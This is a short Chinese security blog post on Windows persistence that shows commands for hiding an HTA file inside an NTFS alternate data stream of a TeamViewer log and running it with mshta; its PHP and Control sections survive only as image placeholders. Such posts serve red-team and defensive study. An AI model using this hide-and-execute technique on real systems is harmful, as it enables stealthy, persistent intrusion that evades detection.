avatar
文章
145
标签
13
分类
11
首页
文章
  • 归档
  • 标签
  • 分类
友链
关于我
Demon
搜索
首页
文章
  • 归档
  • 标签
  • 分类
友链
关于我

维权访问-ADS数据流

发表于2018-01-17|更新于2022-11-25|ATT&CK
|阅读量:

TeamViewer13

1
2
3
C :\>type :\temp\helloworld.hta >"C :\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
C :\>mshta"c :\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

enter description here

enter description here

enter description here

2.PHP

未寄宿 可以执行
enter description here

删除文件
enter description here

删除文件—-寄宿数据流成功,并可以运行
enter description here

3.Control

enter description here

enter description here

链接资料:https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://twitter.com/bohops/status/954466315913310209

文章作者: Demon
文章链接: https://www.ggsec.cn/APT.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Demon!
windowsATT&CK
cover of previous post
上一篇
Mshta_RegSvcsRegAsmBypass
cover of next post
下一篇
Subtee_AllTheThings
相关推荐
cover
2018-04-12
ADS2 数据流
cover
2018-10-09
POC_ADS_Hijack_explorer
cover
2018-09-01
ALPC_EXP
cover
2019-04-29
AVIator
cover
2018-01-03
CL_Invocation | Powershell
cover
2019-08-03
Covenant
avatar
Demon
没有绝对安全的系统
文章
145
标签
13
分类
11
Follow Me
公告
2022-11-24:博客最近大升级,未来几年应该都保持这个风格。
QQ群
目录
  1. 1. TeamViewer13
  2. 2. 2.PHP
  3. 3. 3.Control
最新文章
基于CMD勒索脚本混淆分析
基于CMD勒索脚本混淆分析2022-08-14
obfuscation_from_Excel_VBA_Part2
obfuscation_from_Excel_VBA_Part22022-01-07
obfuscation_from_Excel_VBA_Part1
obfuscation_from_Excel_VBA_Part12022-01-06
HANCITOR_WITH_COBALT_STRIKE
HANCITOR_WITH_COBALT_STRIKE2021-10-17
魔罗桫组织与 Pegasus 间谍软件
魔罗桫组织与 Pegasus 间谍软件2021-09-21
©2020 - 2022 By Demon
团队博客→即刻安全
没有绝对安全的系统
搜索
数据库加载中